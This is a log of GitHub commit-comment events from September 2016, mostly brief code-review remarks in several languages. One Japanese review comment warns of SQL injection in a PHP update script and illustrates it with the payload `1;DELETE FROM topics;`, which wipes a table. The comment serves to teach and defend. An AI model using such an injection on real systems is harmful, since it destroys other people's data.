{"id":"4615649629","type":"CommitCommentEvent","actor":{"login":"kurupmk59"},"repo":{"name":"kurupmk59/Java8Final"},"payload":{"comment":{"id":19167316,"position":4,"line":14,"path":"Java8Final/src/school/Calculator.java","commit_id":"305dd2b719f189433a4096620643fc6d6f92ff19","created_at":"2016-09-26T04:00:32Z","updated_at":"2016-09-26T04:00:32Z","body":"should replace method from println to print "}},"created_at":"2016-09-26T04:00:32Z"}
{"id":"4615655207","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19167327,"position":1,"line":25,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T04:02:53Z","updated_at":"2016-09-26T04:02:53Z","body":"`$stmt = $pdo -> prepare(\"UPDATE topics SET name=:nameafter WHERE id='$id'\");`\r\n\r\nこのidの書き方のままですとSQLインジェクションの脆弱性をはらんでしまっています〜;\r\n\r\n### 例えばSQLインジェクションのイメージです。\r\n\r\n`$_POST['id'];` に\r\n\r\n`1;DELETE FROM topics; `\r\n\r\nという文字列が入っていますと、\r\n\r\n`\"UPDATE topics SET name=:nameafter WHERE id='$id'\"`\r\n\r\nは`UPDATE topics SET name=:nameafter WHERE id=1;DELETE FROM topics;`\r\n\r\nというSQL文になり、(SQL文は`;`で区切ると複数の SQL文が順に実行されます。)テーブルの全件データが削除できてしまいます。"}},"created_at":"2016-09-26T04:02:53Z"}
{"id":"4615659202","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"simpleinvoices/simpleinvoices"},"payload":{"comment":{"id":19167334,"position":null,"line":null,"path":null,"commit_id":"d163cd9e7eee6abf2d7774e84af45b3d357d5c10","created_at":"2016-09-26T04:04:42Z","updated_at":"2016-09-26T04:04:42Z","body":"The only way is to have a config variable to choose which extension's auth is to be used and whether it should be the only one or be before / after the global one. If each extension has their own config variables in their folders and got them all read in sequence, then there is the possibility of of some being overwritten by those in later includes and again some may be intentional and others not. Better still have different auth plugins that override the global one!"}},"created_at":"2016-09-26T04:04:42Z"}
{"id":"4615660623","type":"CommitCommentEvent","actor":{"login":"T-baby"},"repo":{"name":"T-baby/MongoDB-Plugin"},"payload":{"comment":{"id":19167337,"position":null,"line":null,"path":null,"commit_id":"a83a0a2469c2fec9b70d38525e77b9d5bb600e96","created_at":"2016-09-26T04:05:16Z","updated_at":"2016-09-26T04:05:16Z","body":"版本号应当是1.0.7.1"}},"created_at":"2016-09-26T04:05:16Z"}
{"id":"4615662481","type":"CommitCommentEvent","actor":{"login":"scottwarren"},"repo":{"name":"universityofadelaide/docker-apache2-php7"},"payload":{"comment":{"id":19167341,"position":null,"line":null,"path":null,"commit_id":"1dd546a9d58cd019486d5bd370ee9add1db4bc0e","created_at":"2016-09-26T04:06:06Z","updated_at":"2016-09-26T04:06:06Z","body":"@caseyfw did you introduce `YOLO` commits ...."}},"created_at":"2016-09-26T04:06:06Z"}
{"id":"4615664676","type":"CommitCommentEvent","actor":{"login":"benschac"},"repo":{"name":"JulianNorton/weather-10kb"},"payload":{"comment":{"id":19167346,"position":113,"line":76,"path":"views/pages/index.ejs","commit_id":"94d5dba6d36a9fbf37533f39d9ce1b7a68e2c58e","created_at":"2016-09-26T04:07:06Z","updated_at":"2016-09-26T04:07:06Z","body":"Time."}},"created_at":"2016-09-26T04:07:06Z"}
{"id":"4615667933","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":19167349,"position":null,"line":null,"path":null,"commit_id":"76c7d656a00b3b7d3210432ff6ebe8e45cc14ba6","created_at":"2016-09-26T04:08:38Z","updated_at":"2016-09-26T04:08:38Z","body":"comment 123"}},"created_at":"2016-09-26T04:08:38Z"}
{"id":"4615677360","type":"CommitCommentEvent","actor":{"login":"brad0"},"repo":{"name":"lighttpd/lighttpd1.4"},"payload":{"comment":{"id":19167369,"position":null,"line":null,"path":null,"commit_id":"93afda9c8e6016dc132e6cac35a322be62b3cb03","created_at":"2016-09-26T04:13:13Z","updated_at":"2016-09-26T04:13:13Z","body":"Ya, I just noticed the comment indicating its use on Linux but it should be available elsewhere too. Although this comment was probably written back in 2013. The latest code builds on OpenBSD and builds with the newer API accept4 / pipe2. Haven't done any run time testing yet."}},"created_at":"2016-09-26T04:13:13Z"}
{"id":"4615680202","type":"CommitCommentEvent","actor":{"login":"jiaozhuangfei"},"repo":{"name":"jiaozhuangfei/myFirstRepository"},"payload":{"comment":{"id":19167371,"position":null,"line":null,"path":null,"commit_id":"cdb30b1859196efb66359d487096032c23eaec14","created_at":"2016-09-26T04:14:38Z","updated_at":"2016-09-26T04:14:38Z","body":"修改描述"}},"created_at":"2016-09-26T04:14:38Z"}
{"id":"4615687810","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19167377,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T04:18:24Z","updated_at":"2016-09-26T04:18:24Z","body":"@gsherwood Nah, thank *you* for all the work you do on PHPCS. I cannot imagine the PHP infrastructure without it, so very much appreciate it.\r\n\r\nRe - the filenames. when I have some time I'll try to look into this a little more. thanks for your thoughts on this."}},"created_at":"2016-09-26T04:18:24Z"}
{"id":"4615687882","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167378,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T04:18:26Z","updated_at":"2016-09-26T04:18:26Z","body":"I don't think this will  compile if conntrack is not enabled in the kernel. Lines 295-"}},"created_at":"2016-09-26T04:18:26Z"}
{"id":"4615692467","type":"CommitCommentEvent","actor":{"login":"koluke"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167382,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T04:20:30Z","updated_at":"2016-09-26T04:20:30Z","body":"You can do so at your own leisure, lol.  Main thing is that there's a working version available, so whenever is good.  Now that I've got it working for the 2016-17 academic year, it's really now just adding improvements and optimizations, or whatever direction we end up going."}},"created_at":"2016-09-26T04:20:30Z"}
{"id":"4615694386","type":"CommitCommentEvent","actor":{"login":"nammafunteam"},"repo":{"name":"nammafunteam/nammarepository"},"payload":{"comment":{"id":19167384,"position":null,"line":null,"path":null,"commit_id":"76c7d656a00b3b7d3210432ff6ebe8e45cc14ba6","created_at":"2016-09-26T04:21:24Z","updated_at":"2016-09-26T04:21:24Z","body":"comment 1234"}},"created_at":"2016-09-26T04:21:24Z"}
{"id":"4615695697","type":"CommitCommentEvent","actor":{"login":"wardbell"},"repo":{"name":"angular/quickstart"},"payload":{"comment":{"id":19167386,"position":null,"line":null,"path":null,"commit_id":"ea70d3a88dae6d3c104bb60fe343caf037e1bb76","created_at":"2016-09-26T04:21:59Z","updated_at":"2016-09-26T04:21:59Z","body":"No. Removing them now."}},"created_at":"2016-09-26T04:21:59Z"}
{"id":"4615698707","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19167390,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T04:23:30Z","updated_at":"2016-09-26T04:23:30Z","body":"@jrfnl You're very welcome."}},"created_at":"2016-09-26T04:23:30Z"}
{"id":"4615706114","type":"CommitCommentEvent","actor":{"login":"neindk"},"repo":{"name":"laravel/laravel"},"payload":{"comment":{"id":19167404,"position":null,"line":null,"path":null,"commit_id":"76db1006cca54f0364b313bef604ac59c5f9b1f0","created_at":"2016-09-26T04:27:09Z","updated_at":"2016-09-26T04:27:09Z","body":"I am trying to figure out whats going on here? \r\nI have following working code(Works fine with previous one) where  <i>from</i> and <i>to</i>  in url are dynamic integer that result should be taken from DB.\r\nvar url = '/member/list_ajax/' + from + '/' + to;\r\n                this.$http.get(url).then(function (response) {\r\n                    console.log(response);\r\n                            //this.list        = response.data.data;\r\n                            //this.totalResult = response.data.totalResult;\r\n                        },\r\n                        function () {\r\n                        }.bind(this));\r\n\r\nwhen i use <i>request.headers['X-CSRF-TOKEN'] = Laravel.csrfToken;</i>, it works fine and when i change it into  <i>request.headers.set('X-CSRF-TOKEN', Laravel.csrfToken)</i>,  the error occurs and the console says <i> (program):280 TypeError: Cannot read property 'replace' of undefined</i> because there is not getting json response properly.\r\n(May be I am wrong but i think this is because of token mismatch due to failure of setting  request header properly )\r\n\r\nPS;;\r\nWhen i visit the url something like <i>/member/list_ajax/0/10</i>, its shows the correct json response."}},"created_at":"2016-09-26T04:27:09Z"}
{"id":"4615711876","type":"CommitCommentEvent","actor":{"login":"S525079"},"repo":{"name":"S525079/partyguardwebapp_partyfreaks"},"payload":{"comment":{"id":19167409,"position":null,"line":null,"path":null,"commit_id":"e6793c5aee7cec39a56cf1f2dfd396d79fa9a4c5","created_at":"2016-09-26T04:30:06Z","updated_at":"2016-09-26T04:30:06Z","body":"services required by web application "}},"created_at":"2016-09-26T04:30:06Z"}
{"id":"4615717315","type":"CommitCommentEvent","actor":{"login":"ballweera"},"repo":{"name":"TorPeerapol/tennisgame"},"payload":{"comment":{"id":19167416,"position":null,"line":null,"path":null,"commit_id":"7cc92b304f1182f9483a5a28d0265c112c0ecc7d","created_at":"2016-09-26T04:32:47Z","updated_at":"2016-09-26T04:32:47Z","body":"Tennis ต้องเป็น class ที่มี state และ behavior นะครับ ไม่ใช่เป็น function เฉยๆ แบบนี้"}},"created_at":"2016-09-26T04:32:47Z"}
{"id":"4615718827","type":"CommitCommentEvent","actor":{"login":"pquentin"},"repo":{"name":"Yoric/yoric.github.io"},"payload":{"comment":{"id":19167419,"position":null,"line":null,"path":null,"commit_id":"f3a2f7042db103f255d606144f311c52824da41d","created_at":"2016-09-26T04:33:36Z","updated_at":"2016-09-26T04:33:36Z","body":"Why delete this post?"}},"created_at":"2016-09-26T04:33:36Z"}
{"id":"4615720140","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/rmw"},"payload":{"comment":{"id":19167421,"position":60,"line":537,"path":"src/functions/purging_rmw.c","commit_id":"94f60363be2e4118dbf460122a3311728539a964","created_at":"2016-09-26T04:34:17Z","updated_at":"2016-09-26T04:34:17Z","body":"Oh my. Many blank lines. I must remember to remove these."}},"created_at":"2016-09-26T04:34:17Z"}
{"id":"4615721499","type":"CommitCommentEvent","actor":{"login":"Y-Iwami"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19167424,"position":29,"line":690,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"33153eb7113e00de73be401c7905bb6d5824c03c","created_at":"2016-09-26T04:34:58Z","updated_at":"2016-09-26T04:34:58Z","body":"L686にてshow['params']を設定しているのが冗長ではないでしょうか。"}},"created_at":"2016-09-26T04:34:58Z"}
{"id":"4615721719","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/docs"},"payload":{"comment":{"id":19167425,"position":28,"line":28,"path":"docs/internals/javascript_css_build.md","commit_id":"d502e90cf1b17e80bc117c806bae7750e46ff4a6","created_at":"2016-09-26T04:35:05Z","updated_at":"2016-09-26T04:35:05Z","body":"Is this the right place to keep these noted?\r\n\r\n… they change very frequently, and it would be conceivably very easy to overlook :smile: \r\n\r\nSame with the BS version below\r\n"}},"created_at":"2016-09-26T04:35:05Z"}
{"id":"4615725317","type":"CommitCommentEvent","actor":{"login":"mandeeps708"},"repo":{"name":"singh1114/LibreHatti"},"payload":{"comment":{"id":19167435,"position":9,"line":9,"path":"JSONparser/main.html","commit_id":"d85596720f09de505465b05179cc57a217ac5020","created_at":"2016-09-26T04:37:00Z","updated_at":"2016-09-26T04:37:00Z","body":"Will giving the address like this work for every user? Or this is for some other purpose?\r\n\r\nWill this link return json?"}},"created_at":"2016-09-26T04:37:00Z"}
{"id":"4615725409","type":"CommitCommentEvent","actor":{"login":"koluke"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167436,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T04:37:04Z","updated_at":"2016-09-26T04:37:04Z","body":"Also, just an FYI, I've pretty much finished moving us from in-house enterprise distribution to App Store distribution due to student/parent/faculty/staff demand and advancements in Apple's MDM and VPP specs."}},"created_at":"2016-09-26T04:37:04Z"}
{"id":"4615727135","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167441,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T04:38:00Z","updated_at":"2016-09-26T04:38:00Z","body":"Which is why it's wrapped in an if def at line 284-\r\n #if defined(CONFIG_NF_CONNTRACK) || defined(CONFIG_NF_CONNTRACK_MODULE)"}},"created_at":"2016-09-26T04:38:00Z"}
{"id":"4615728384","type":"CommitCommentEvent","actor":{"login":"arr2036"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19167444,"position":null,"line":null,"path":null,"commit_id":"461cfc3bafd36525eec95ea0abb6119205a59382","created_at":"2016-09-26T04:38:36Z","updated_at":"2016-09-26T04:38:36Z","body":"As far as I can see you haven't actually articulated any justification for your position.  You say \"there's a reason\", but don't actually give a reason, which usually means there isn't one.\r\n\r\nI don't see there's any difference between setting a default port and a default IP address, in 99% of cases users want to bind the authentication port to 1812, in 99% of cases users want to bind to all IP interfaces.\r\n\r\nLooks like we can change it to ``in6addr_any`` which binds all v4 and v6 and would be a better option, I'll do that now..."}},"created_at":"2016-09-26T04:38:36Z"}
{"id":"4615729152","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19167447,"position":null,"line":null,"path":null,"commit_id":"bae59470da406811773aaae5e1c8ce578be50597","created_at":"2016-09-26T04:39:00Z","updated_at":"2016-09-26T04:39:00Z","body":"What's the advantage of this? It just seems to add more lines of code."}},"created_at":"2016-09-26T04:39:00Z"}
{"id":"4615729159","type":"CommitCommentEvent","actor":{"login":"ram-143"},"repo":{"name":"ram-143/rama"},"payload":{"comment":{"id":19167448,"position":null,"line":null,"path":null,"commit_id":"6318e6868b9a696c94119d8569a52fa2b25fc8f5","created_at":"2016-09-26T04:39:01Z","updated_at":"2016-09-26T04:39:01Z","body":"Hai Friends \r\n\r\nHow Are You I Think You Are in The Trails For Jobs \r\nFor This All The Best To You "}},"created_at":"2016-09-26T04:39:01Z"}
{"id":"4615730701","type":"CommitCommentEvent","actor":{"login":"sivan"},"repo":{"name":"sivan/gulp-assets-plus"},"payload":{"comment":{"id":19167453,"position":4,"line":33,"path":"README.md","commit_id":"b49aad5402a7db7571feb2c95676d465a61c9e1e","created_at":"2016-09-26T04:39:48Z","updated_at":"2016-09-26T04:39:48Z","body":"Oops, just fixed it. Thx @sknep "}},"created_at":"2016-09-26T04:39:48Z"}
{"id":"4615732514","type":"CommitCommentEvent","actor":{"login":"pingers"},"repo":{"name":"universityofadelaide/docker-apache2-php7"},"payload":{"comment":{"id":19167459,"position":null,"line":null,"path":null,"commit_id":"1dd546a9d58cd019486d5bd370ee9add1db4bc0e","created_at":"2016-09-26T04:40:43Z","updated_at":"2016-09-26T04:40:43Z","body":"I'm sure it was him :smile: "}},"created_at":"2016-09-26T04:40:43Z"}
{"id":"4615733322","type":"CommitCommentEvent","actor":{"login":"SchopenhauerZhang"},"repo":{"name":"SchopenhauerZhang/Here-and-There"},"payload":{"comment":{"id":19167461,"position":null,"line":null,"path":null,"commit_id":"bea947474ad624aac790b9f74a43bd81a99bec05","created_at":"2016-09-26T04:41:06Z","updated_at":"2016-09-26T04:41:06Z","body":"make star move "}},"created_at":"2016-09-26T04:41:06Z"}
{"id":"4615733889","type":"CommitCommentEvent","actor":{"login":"scottwarren"},"repo":{"name":"universityofadelaide/docker-apache2-php7"},"payload":{"comment":{"id":19167464,"position":null,"line":null,"path":null,"commit_id":"1dd546a9d58cd019486d5bd370ee9add1db4bc0e","created_at":"2016-09-26T04:41:22Z","updated_at":"2016-09-26T04:41:22Z","body":"haha damn it Casey"}},"created_at":"2016-09-26T04:41:22Z"}
{"id":"4615736682","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19167469,"position":29,"line":690,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"33153eb7113e00de73be401c7905bb6d5824c03c","created_at":"2016-09-26T04:42:51Z","updated_at":"2016-09-26T04:42:51Z","body":"ありがとうございます。削除忘れですので、修正します。"}},"created_at":"2016-09-26T04:42:51Z"}
{"id":"4615742464","type":"CommitCommentEvent","actor":{"login":"loganfsmyth"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19167487,"position":null,"line":null,"path":null,"commit_id":"bae59470da406811773aaae5e1c8ce578be50597","created_at":"2016-09-26T04:45:46Z","updated_at":"2016-09-26T04:45:46Z","body":"Personally, I'm for it so we can avoid a random mishmash of ES6+CommonJS"}},"created_at":"2016-09-26T04:45:46Z"}
{"id":"4615747393","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19167494,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T04:48:13Z","updated_at":"2016-09-26T04:48:13Z","body":"> so the defaulthtmlviewer/basichtmlviewer by default will be dillo.. of\r\ncourse this is in woof, usually this values are overriden/changed.\r\n\r\nYou may want to add a really small help viewer in rootfs-skeleton and hardcode it instead of going  the default\\<app\\> way.\r\nThough I think we are getting our life complicated and may get in trouble down the road when a simple \"please wait...\" message should do. \r\nBTW how tricky is it to just implement a spinning cursor instead of al these wait messages that are allover puppy scripts?"}},"created_at":"2016-09-26T04:48:13Z"}
{"id":"4615748314","type":"CommitCommentEvent","actor":{"login":"arr2036"},"repo":{"name":"FreeRADIUS/freeradius-server"},"payload":{"comment":{"id":19167499,"position":null,"line":null,"path":null,"commit_id":"461cfc3bafd36525eec95ea0abb6119205a59382","created_at":"2016-09-26T04:48:42Z","updated_at":"2016-09-26T04:48:42Z","body":"ah except we can't.  So I guess the reason \"why not both\" is because you explicitly disabled the functionality that would allow both..."}},"created_at":"2016-09-26T04:48:42Z"}
{"id":"4615752885","type":"CommitCommentEvent","actor":{"login":"uscitp-noahbake"},"repo":{"name":"uscitp-noahbake/itp125"},"payload":{"comment":{"id":19167505,"position":null,"line":null,"path":null,"commit_id":"ed10fa4070f22bbf56587276953f1a6f2067b049","created_at":"2016-09-26T04:51:06Z","updated_at":"2016-09-26T04:51:06Z","body":"Homework 4 Submission"}},"created_at":"2016-09-26T04:51:06Z"}
{"id":"4615755699","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167508,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T04:52:34Z","updated_at":"2016-09-26T04:52:34Z","body":"ok, got that.\r\n\r\nwhat happens if you configure it on a live system as if you are using nat when you are not using nat?\r\n(the firewall flushes and reloads)"}},"created_at":"2016-09-26T04:52:34Z"}
{"id":"4615760172","type":"CommitCommentEvent","actor":{"login":"hzoo"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":19167517,"position":null,"line":null,"path":null,"commit_id":"bae59470da406811773aaae5e1c8ce578be50597","created_at":"2016-09-26T04:54:46Z","updated_at":"2016-09-26T04:54:46Z","body":"Yeah maybe unnecessary, but I guess consistency for es6 imports"}},"created_at":"2016-09-26T04:54:46Z"}
{"id":"4615765155","type":"CommitCommentEvent","actor":{"login":"mrHennessy"},"repo":{"name":"mrHennessy/like"},"payload":{"comment":{"id":19167528,"position":5,"line":21,"path":"resources/views/user/include/sidebar.blade.php","commit_id":"cd0ecc7dd07e5a2cd9b63542acfc3a6ce9837172","created_at":"2016-09-26T04:57:14Z","updated_at":"2016-09-26T04:57:14Z","body":"Редактировано\r\n"}},"created_at":"2016-09-26T04:57:14Z"}
{"id":"4615765930","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19167529,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T04:57:37Z","updated_at":"2016-09-26T04:57:37Z","body":"That is not the latest one."}},"created_at":"2016-09-26T04:57:37Z"}
{"id":"4615771866","type":"CommitCommentEvent","actor":{"login":"timheap"},"repo":{"name":"takeflight/wagtail-metadata"},"payload":{"comment":{"id":19167543,"position":null,"line":null,"path":null,"commit_id":"cbc9d14c3d43d6053a662e3ccedf4c855771b4d3","created_at":"2016-09-26T05:00:34Z","updated_at":"2016-09-26T05:00:34Z","body":"I dont think that Images have a `full_url`, only Pages?"}},"created_at":"2016-09-26T05:00:34Z"}
{"id":"4615775078","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19167547,"position":null,"line":null,"path":null,"commit_id":"8ae55e35678d558c342936edc1fd61d2f120ac19","created_at":"2016-09-26T05:02:07Z","updated_at":"2016-09-26T05:02:07Z","body":"correction to that recipe, the last line is actually\r\n\r\n_b_"}},"created_at":"2016-09-26T05:02:07Z"}
{"id":"4615775305","type":"CommitCommentEvent","actor":{"login":"Y-Iwami"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19167548,"position":949,"line":949,"path":"ryu/app/rest_vtep.py","commit_id":"76816b7668f139515e1afa0cca11965785eadece","created_at":"2016-09-26T05:02:12Z","updated_at":"2016-09-26T05:02:12Z","body":"(RESTのあるべき姿をわかっていませんが、)\r\nリソースが1つに限定される場合、作成されたリソースへのアクセスは\r\n/vtep/speaker/(uuid)のようにしなくてもよいのでしょうか。\r\nその他のリソースとの階層を同じにしたり、拡張性を確保するためにも\r\n/vtep/speakers/local_addrとかにしてもよいかと思いました。"}},"created_at":"2016-09-26T05:02:12Z"}
{"id":"4615776731","type":"CommitCommentEvent","actor":{"login":"kdarbyshirebryant"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167550,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T05:02:54Z","updated_at":"2016-09-26T05:02:54Z","body":"If I understand the question correctly:  You'll waste a bit of cpu looking for a conntrack entry that either a) doesn't exist or b) has the same addresses in it as there's no translation going on.  That's what happens on my router at least :-)"}},"created_at":"2016-09-26T05:02:54Z"}
{"id":"4615777259","type":"CommitCommentEvent","actor":{"login":"kskarthik"},"repo":{"name":"mozilla-b2g/gaia"},"payload":{"comment":{"id":19167552,"position":null,"line":null,"path":null,"commit_id":"975a35c0f5010df341e96d6c5ec60217f5347412","created_at":"2016-09-26T05:03:08Z","updated_at":"2016-09-26T05:03:08Z","body":"Hmm.. But, we are no more foxfood. You are welcome to enhance the existing one ☺"}},"created_at":"2016-09-26T05:03:08Z"}
{"id":"4615777999","type":"CommitCommentEvent","actor":{"login":"Y-Iwami"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19167553,"position":1000,"line":1000,"path":"ryu/app/rest_vtep.py","commit_id":"76816b7668f139515e1afa0cca11965785eadece","created_at":"2016-09-26T05:03:27Z","updated_at":"2016-09-26T05:03:27Z","body":"作成されていない場合に実行されると{}が返却されますが、404が返ってきたほうが自然ではないでしょうか。\r\n(neighbors/neighborのような構造になっていないのでget_neighbors相当の処理ということはわかっていますが…)"}},"created_at":"2016-09-26T05:03:27Z"}
{"id":"4615780186","type":"CommitCommentEvent","actor":{"login":"charliethinker"},"repo":{"name":"charliethinker/charliethinker.github.io"},"payload":{"comment":{"id":19167556,"position":null,"line":null,"path":null,"commit_id":"8919ded3fb7aea3ff850591951749829d07d4864","created_at":"2016-09-26T05:04:29Z","updated_at":"2016-09-26T05:04:29Z","body":"通用智图软件把所有的图片压缩了一点。"}},"created_at":"2016-09-26T05:04:29Z"}
{"id":"4615782885","type":"CommitCommentEvent","actor":{"login":"z3cka"},"repo":{"name":"z3cka/docker-phpbrew-drupal"},"payload":{"comment":{"id":19167562,"position":20,"line":26,"path":"Dockerfile","commit_id":"442a0d5d303fbd8323520849d1009f2f60313edd","created_at":"2016-09-26T05:05:45Z","updated_at":"2016-09-26T05:05:45Z","body":"These aliases don't work. These need to be converted to symlinks."}},"created_at":"2016-09-26T05:05:45Z"}
{"id":"4615783504","type":"CommitCommentEvent","actor":{"login":"Epik17"},"repo":{"name":"Epik17/Zaglushka"},"payload":{"comment":{"id":19167563,"position":null,"line":null,"path":null,"commit_id":"23eabab337c026797c17d4b12403dcad24aef8b1","created_at":"2016-09-26T05:06:04Z","updated_at":"2016-09-26T05:06:04Z","body":"It is the text file validity which is checked!"}},"created_at":"2016-09-26T05:06:04Z"}
{"id":"4615783550","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19167564,"position":949,"line":949,"path":"ryu/app/rest_vtep.py","commit_id":"76816b7668f139515e1afa0cca11965785eadece","created_at":"2016-09-26T05:06:05Z","updated_at":"2016-09-26T05:06:05Z","body":"それも考えたのですが...\r\nBGPSpeaker が１つしかインスタンスを作れないので、\r\nあえて `/vtep/speakers` と複数形にすることを避けました。\r\n\r\n拡張性の意味では、ご指摘の通り、\r\n`/vtep/speakers/{router_id}`\r\nとしても良いかと思いますが..."}},"created_at":"2016-09-26T05:06:05Z"}
{"id":"4615783821","type":"CommitCommentEvent","actor":{"login":"jadefox10200"},"repo":{"name":"jadefox10200/Hello"},"payload":{"comment":{"id":19167565,"position":null,"line":null,"path":null,"commit_id":"760b6afada8e7a481c6f0e541ad32bdaca08ed41","created_at":"2016-09-26T05:06:14Z","updated_at":"2016-09-26T05:06:14Z","body":"This is testing"}},"created_at":"2016-09-26T05:06:14Z"}
{"id":"4615784365","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19167566,"position":null,"line":null,"path":null,"commit_id":"c53b3a0c1c492984c985ded660d8bad827c7948d","created_at":"2016-09-26T05:06:30Z","updated_at":"2016-09-26T05:06:30Z","body":"@valib I know the feeling, I've had that happen myself. It's frustrating, but I try to wait some days and if I hear nothing by then, I \"bump\" it by adressing the developers group."}},"created_at":"2016-09-26T05:06:30Z"}
{"id":"4615784844","type":"CommitCommentEvent","actor":{"login":"asazernik"},"repo":{"name":"erikras/redux-form"},"payload":{"comment":{"id":19167568,"position":null,"line":null,"path":null,"commit_id":"c95bec141ee2c26ca62f2fa6cd2b550c188eb307","created_at":"2016-09-26T05:06:44Z","updated_at":"2016-09-26T05:06:44Z","body":"Would it be possible to get a 5.3.4 release with this commit?"}},"created_at":"2016-09-26T05:06:44Z"}
{"id":"4615788041","type":"CommitCommentEvent","actor":{"login":"dtaht"},"repo":{"name":"kdarbyshirebryant/sch_cake"},"payload":{"comment":{"id":19167576,"position":null,"line":null,"path":null,"commit_id":"fd68acda8c4ca9a9d73ae15d1b01727456613489","created_at":"2016-09-26T05:08:20Z","updated_at":"2016-09-26T05:08:20Z","body":"My \"optimization\" idea was make nat mode the default, and always on, and sample when it fails/succeeds to see which mode it should be in. "}},"created_at":"2016-09-26T05:08:20Z"}
{"id":"4615790613","type":"CommitCommentEvent","actor":{"login":"SableWalnut"},"repo":{"name":"takeflight/wagtail-metadata"},"payload":{"comment":{"id":19167579,"position":null,"line":null,"path":null,"commit_id":"cbc9d14c3d43d6053a662e3ccedf4c855771b4d3","created_at":"2016-09-26T05:09:41Z","updated_at":"2016-09-26T05:09:41Z","body":"It gets added through hacks, should probably be fixed"}},"created_at":"2016-09-26T05:09:41Z"}
{"id":"4615791034","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19167581,"position":null,"line":null,"path":null,"commit_id":"a7bdc2fe840ac594284797cc79573f3c2d3733e2","created_at":"2016-09-26T05:09:53Z","updated_at":"2016-09-26T05:09:53Z","body":"LGTM"}},"created_at":"2016-09-26T05:09:53Z"}
{"id":"4615791646","type":"CommitCommentEvent","actor":{"login":"z3cka"},"repo":{"name":"z3cka/docker-phpbrew-drupal"},"payload":{"comment":{"id":19167582,"position":20,"line":26,"path":"Dockerfile","commit_id":"442a0d5d303fbd8323520849d1009f2f60313edd","created_at":"2016-09-26T05:10:12Z","updated_at":"2016-09-26T05:10:12Z","body":"#1 "}},"created_at":"2016-09-26T05:10:12Z"}
{"id":"4615792392","type":"CommitCommentEvent","actor":{"login":"loganfsmyth"},"repo":{"name":"babel/babylon"},"payload":{"comment":{"id":19167586,"position":1,"line":1,"path":":w","commit_id":"93c3d0df40b025e0c169580eb44316d6355f5d76","created_at":"2016-09-26T05:10:32Z","updated_at":"2016-09-26T05:10:32Z","body":"Something tells me there's an issue here :P"}},"created_at":"2016-09-26T05:10:32Z"}
